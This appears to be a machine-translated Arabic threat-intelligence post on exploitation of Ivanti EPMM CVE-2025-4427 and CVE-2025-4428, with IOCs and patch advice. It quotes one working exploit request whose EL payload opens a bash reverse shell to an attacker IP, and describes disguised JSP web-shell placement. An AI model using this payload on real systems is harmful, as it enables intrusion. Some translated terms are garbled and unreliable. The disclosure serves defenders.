تم التحديث بتاريخ 21-05-2025 الساعة 10:00 (GMT+3) لتوضيح العلاقة بين عناوين IP المختلفة في قسم الاستغلال، وفي الساعة 20:00 (GMT+3) لوصف طرق الاستغلال الإضافية التي تمت ملاحظتها في البرية.

تم التحديث بتاريخ 23-05-2025 الساعة 20:00 (GMT+3) لإصلاح خطأ في الفقرة الافتتاحية؛ لقد ذكرنا سابقًا أنه تم نشر الثغرات الأمنية في شهر مارس بدلاً من شهر مايو (كما هو مذكور في NVD، تم نشر الثغرات الأمنية في 13 مايو 2025).

مقدمة

في 13 مايو 2025، كشفت Ivanti أن Endpoint Manager Mobile (EPMM) يتأثر بسلسلة ثغرات تجمع بين تجاوز المصادقة (CVE-2025-4427) وثغرة أمنية في تنفيذ التعليمات البرمجية عن بعد بعد المصادقة (CVE-2025-4428). يمكن استغلال هذه العيوب، والتي تنبع من الاستخدام غير الآمن للغة Java Expression Language في رسائل الخطأ والتوجيه الذي تمت تهيئته بشكل خاطئ، معًا لتحقيق RCE غير مصادق عليه. لذلك، على الرغم من أنه لم يتم تحديد خطورة حرجة لأي من هذه الثغرات الأمنية (درجات CVSS الخاصة بها هي 5.3 و7.2 على التوالي)، إلا أنه يجب بالتأكيد التعامل معها معًا على أنها حرجة.

أكدت شركة Ivanti وجود استغلال محدود لهذه الثغرات الأمنية على أرض الواقع قبل 0 يومًا من الكشف عنها، و يمكن لـ Wiz الآن تأكيد الاستغلال المستمر لهذه الثغرات الأمنية.

ما هو CVE-2025-4427 وCVE-2025-4428؟

CVE-2025-4428 هي ثغرة أمنية في تنفيذ التعليمات البرمجية عن بعد بعد المصادقة في EPMM DeviceFeatureUsageReportQueryRequestValidator. ينشأ ذلك من المعالجة غير الآمنة للمدخلات التي يقدمها المستخدم ضمن رسائل الخطأ التي تتم معالجتها عبر Spring’s AbstractMessageSource، والذي يسمح بحقن EL (لغة التعبير) التي يتحكم فيها المهاجم. معلمة تنسيق معدة في ملف /api/v2/featureusage تؤدي نقطة النهاية إلى تنفيذ تعليمات برمجية عشوائية لـ Java، ويتم تأكيدها عبر إدخال الأوامر (على سبيل المثال، Runtime.exec()).

CVE-2025-4427 عبارة عن تجاوز للمصادقة ناتج عن معالجة الطلب غير الصحيحة في تكوين مسار EPMM. طرق مثل /rs/api/v2/featureusage تم كشفها عن غير قصد دون الحاجة إلى المصادقة بسبب فقدانها <intercept-url> القواعد في تكوينات Spring Security. يسمح هذا بالوصول غير المصادق إلى مخزن RCE، مما يتيح المصادقة المسبقة الكاملة لـ RCE عند ربطه بالتسلسل مع CVE-2025-4428. ومع ذلك، كما لاحظت watchTowr، يتم وصف هذا بشكل أكثر دقة على أنه عيب في ترتيب العمليات، حيث يتم تنفيذ منطق المدقق قبل عمليات التحقق من المصادقة.

ما هي الإصدارات المتضررة؟

Ivanti Endpoint Manager Mobile (EPMM) في الإصدارات:

  • 11.12.0.4 وما قبله

  • 12.3.0.1 وما قبله

  • 12.4.0.1 وما قبله

  • 12.5.0.0 وما قبله

الاستغلال في البرية

لاحظت Wiz Threat Research استغلالًا نشطًا على أرض الواقع لثغرات Ivanti EPMM التي تم الكشف عنها مؤخرًا بدءًا من 16 مايو 2025. ويتوافق هذا النشاط مع الإصدار العام لثغرات إثبات المفهوم (PoC) من خلال مصادر متعددة، بما في ذلك watchTowr وProjectDiscovery.
لقد حدد فريقنا تقنيات استغلال متعددة، مما يشير إلى تورط جهات تهديد مختلفة.

نشاط الشظية

حدد Wiz العديد من الحمولات الضارة التي تم نشرها بعد الاستغلال، وفي حالة واحدة ذات أهمية خاصة، منارة Sliver تستخدم 77.221.158[.]154 كخادم C2 الخاص به (SHA1: 1b1dda5e8e26da568559e0577769697c624df30e). تمت ملاحظة عنوان IP هذا في العديد من الحملات السابقة التي استهدفت الأجهزة المكشوفة بشكل مماثل، كما كشفنا البحوث الخاصة في استغلال ثغرات PAN-OS قبل بضعة أشهر فقط (CVE-2024-0012 & CVE-2024-9474).

يبدو أن عنوان IP هذا لا يزال قيد التشغيل من قبل جهة التهديد، حيث لم تتغير شهادته منذ نوفمبر 2024 وتبقى: Issuer: C=PL O=home.pl S.A. CN=Certyfikat SSL (بصمة: 9f2a1967c502e0e70bec7481e6c3e32c9b5723cb20ac249255946c9a4862e956). تقودنا هذه الاستمرارية إلى استنتاج أن نفس الممثل كان يستهدف بشكل انتهازي كلاً من أجهزة PAN-OS وIvanti EPMM.

يتم تقديم الشهادة المذكورة أعلاه بواسطة عدد صغير فقط من الخوادم في جميع أنحاء العالم، والتي قد يتم تشغيلها أو اختراقها بواسطة هذا الممثل أيضًا:

  • 185.174.137[.]26

  • 46.41.134[.]8

  • 79.96.45[.]181

  • com.electrobohater[.]رر

  • com.wagodirect[.]رر

  • e-wago[.]رر

كما ذكرنا في تغطيتنا لنشاط استغلال PAN-OS، 77.221.158[.]154 سبق حل المجال censysinspect[.]com حتى تم إيقافه في النهاية:

الجدول الزمني لحل censysinspect[.]كوم كما مصدر من Validin

نشاط تفريغ MySQL

يمكن تكوين Ivanti EPMM لاستخدام MySQL كواجهة خلفية للعديد من الخدمات، بما في ذلك خادم SQL Auth Server المسؤول عن مصادقة المستخدم وتفويضه. يمكّن هذا التكوين منتجات Ivanti – مثل Endpoint Mobile Manager – من الاعتماد على قواعد بيانات MySQL لإدارة بيانات اعتماد المستخدم وعناصر التحكم في الوصول.
لقد لاحظنا نشاطًا ضارًا ينشأ من عنواني IP مختلفين: 82.132.235[.]212 و 37.219.84[.]22. قام هؤلاء المهاجمون بالوصول إلى جداول حساسة وإلقاءها في الملف mifs قاعدة بيانات MySQL، على وجه التحديد: mifs_ldap_server_config, mifs_ldap_users, mi_user.
بالإضافة إلى التخلص من هذه الجداول، حاول أحد المهاجمين أيضًا إجراء المزيد من الاستطلاع داخل بيئة Ivanti، على الأرجح بحثًا عن بيانات اعتماد المستخدم ومعلومات النظام الإضافية.
تم إصدار بعض الأوامر مباشرة، بينما تم تنزيل البعض الآخر من خدمات الاستضافة العامة مثل dpaste (https://dpaste[.]com/9MQEJ6VYR.txt).

نشر Web Shell متنكر في صورة محتوى مشروع

بالإضافة إلى ذلك، حددت Wiz Research محاولات المهاجم لإنشاء وصول مستمر عن طريق تحميل أغلفة الويب إلى مسارات غير قياسية ولكن معقولة داخل بيئة Ivanti EPMM. على وجه التحديد، لاحظنا وضع قذائف الويب الضارة المستندة إلى JSP في المواقع التالية:

  • /mi/tomcat/webapps/mifs/401.jsp

  • /mi/tomcat/webapps/mifs/css/css.css

  • /mi/tomcat/webapps/mifs/session.jsp

  • /mi/tomcat/webapps/mifs/baseURL.jsp

من المحتمل أن يتم اختيار أسماء الملفات هذه لدمجها مع صفحات معالجة أخطاء HTTP المشروعة، وبالتالي تجنب آليات الكشف الشائعة التي تبحث عن أسماء الملفات المشبوهة أو في غير محلها. من خلال التنكر كصفحات خطأ، يمكن الوصول إلى أغلفة الويب عند الطلب بينما تظهر بشكل حميد في سجلات الخادم أو قوائم الملفات.
تم تنزيل أغطية الويب من خدمات الاستضافة العامة مثل Pastebin أو GitHub، بما في ذلك خدمات الاستضافة المعروفة خلف دبليو اس. واختار مهاجمون آخرون تضمين غلاف الويب مباشرة داخل سطر الأوامر، وترميزه في Base64 وفك تشفيره أثناء التنفيذ. يبدو أن أحد المهاجمين قام أيضًا باختراق موقع ويب شرعي craft-dev.greenenaftaligallery[.]com/a.txtلاستضافة غلاف الويب.

نشاط شل العكسي

هناك تقنية أخرى ملحوظة بعد الاستغلال لاحظناها وهي استخدام قذيفة عكسية مباشرة. في هذه الطريقة، بدأ المهاجمون اتصال Bash العكسي مباشرة من خلال استغلال تنفيذ الأمر. ونتيجة لذلك، لم يتم إنشاء أي عناصر ملف، وعلى عكس الطرق الأخرى الموضحة أعلاه، لم يتم تسجيل تواجد المهاجم وأوامره في سجلات الوصول إلى http.

GET /mifs/rs/api/v2/featureusage?format=${"".getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('sh -i >& /dev/tcp/47.120.74.19/8080 0>&1')}

تُظهر كتلة التعليمات البرمجية أعلاه مثالاً على أحد عمليات استغلال الصدفة العكسية.

مؤشرات التسوية

حددت Wiz Research شركات النفط العالمية التالية ذات الصلة بهذا النشاط:

اللجنة الأولمبية الدولية وصف
1b1dda5e8e26da568559e0577769697c624df30e منارة الشظية (SHA1)
ac389c8b7f3d2fcf4fd73891f881b12b8343665b منارة الشظية (SHA1)
19b4df629f5b15e5ff742c70d2c7dc4dac29a7ce منارة فضية غير معبأة (SHA1)
f780151c151b6cec853a278b4e847ef2af3dbc5d منارة فضية معبأة (SHA1) – تم تنزيلها من البنية التحتية للمهاجم
dce8faf5fcf5998b6802995914caa988ee1ebd92 Unpacked Sliver Beacon (SHA1) – تم تنزيله من البنية التحتية للمهاجم
aa2cfeeca6c8e7743ad1a5996fe5ccc3d52e901d تمت كتابة JSP Webshell إلى session.jsp
2bd61ce5bdd258c7dcbef53aedb1b018b8e0ae26 تمت استضافة JSP Webshell على craft-dev.greenenaftaligallery[.]com
77.221.158[.]154 عنوان IP الفضي C2
150.241.97[.]83 عنوان IP الفضي C2
185.193.125[.]65 استضافة عنوان IP الفضي

عناوين IP التي تمت ملاحظتها في محاولات الاستغلال (بين 16.5.25-19.5.25):

اللجنة الأولمبية الدولية وصف
82.132.235[.]212 نشاط تفريغ MySQL
37.219.84[.]22 نشاط تفريغ MySQL
88.194.29[.]21 نشاط تفريغ MySQL (VPN)
27.25.148[.]183 نشاط الصدفة العكسية المباشرة
83.229.126[.]234 نشاط الصدفة العكسية المباشرة
91.193.19[.]109 نشاط الصدفة العكسية المباشرة (VPN)
47.120.74[.]19 نشاط الصدفة العكسية المباشرة (VPN)
100.26.51[.]59 الحمولة الضارة المستضافة ضمن /ws (VPN)
150.241.71[.]231 مهاجم يقوم بنشر Sliver (VPN)
75.170.92[.]132 خلف نشر WS
5.181.159[.]149 خلف نشر WS (VPN)
45.38.17[.]43 نشر WS (VPN)
75.170.92[.]132 نشر WS

ما هي الخطوات التي يجب على فرق الأمن اتخاذها؟

  • يوصى بتصحيح EPMM إلى أحد الإصدارات المصححة التالية: 11.12.0.5، 12.3.0.2، 12.4.0.2، 12.5.0.1، مع إعطاء الأولوية للأجهزة التي تواجه الإنترنت.

  • تنفيذ القيود على مستوى الشبكة على /rs/api/v2/* و /mifs/rs/api/v2/* نقاط النهاية حتى يتم تطبيق التصحيحات.

كيف يمكن أن يساعد ويز

يمكن لعملاء Wiz استخدام الاستعلامات والاستشارات المعدة مسبقًا في مركز Wiz Threat Intelligence Center للبحث عن المثيلات الضعيفة أو المخترقة لـ Ivanti EPMM في بيئتهم. يكتشف Wiz أجهزة Ivanti الضعيفة و/أو المصابة من خلال مزيج من المسح بدون وكيل للبيئات السحابية لعملائنا والمسح النشط غير المصادق باستخدام Wiz Dynamic Scanner.

في Wiz، قمنا ببناء منصة مجهزة بشكل فريد للاستجابة للتهديدات البارزة التي تواجه البيئات السحابية بسرعة وعمق لا مثيل لهما. من خلال دمج الرؤى على مستوى القرص، والتحقق من إمكانية الاستغلال الخارجي، ومسح السجل، واكتشاف البرامج الضارة بدون وكيل، يوفر Wiz رؤية كاملة عبر دورة حياة إدارة المخاطر والاستجابة للتهديدات في السحابة. وقد أثبت هذا النهج فعاليته بشكل خاص عند تطبيقه على الدفاع عن الأجهزة الافتراضية، والتي غالبًا ما تكون خارج نطاق حلول EDR التقليدية.

عند ظهور تهديدات جديدة لبيئتك السحابية، يساعدك Wiz على الفور على:

  • حدد أي حالات ضعيفة أو تكوين خاطئ للبرنامج المستهدف في بيئتك، مع سياق وقت تشغيل إضافي باستخدام Wiz Sensor وسياق Code-to-Cloud باستخدام Wiz Code.

  • التحقق من إمكانية الاستغلال من الخارج وتحديد أولويات الأصول المعرضة للخطر بشكل فعال، بناءً على سياق الموارد المتضررة مثل الامتيازات العالية أو الوصول إلى البيانات الحساسة.

  • احصل على رؤية واضحة لأي موارد تم اختراقها من قبل جهات التهديد، مع تزويدك أيضًا بتحليل تلقائي لنطاق الانفجار الذي وقع فيه الحادث.

يمنحك هذا النهج الفريد الشفافية والتحكم الكاملين، حتى تتمكن من البقاء في صدارة المهاجمين وحماية الأمور الأكثر أهمية لشركتك.

مراجع

شاركها.
اترك تعليقاً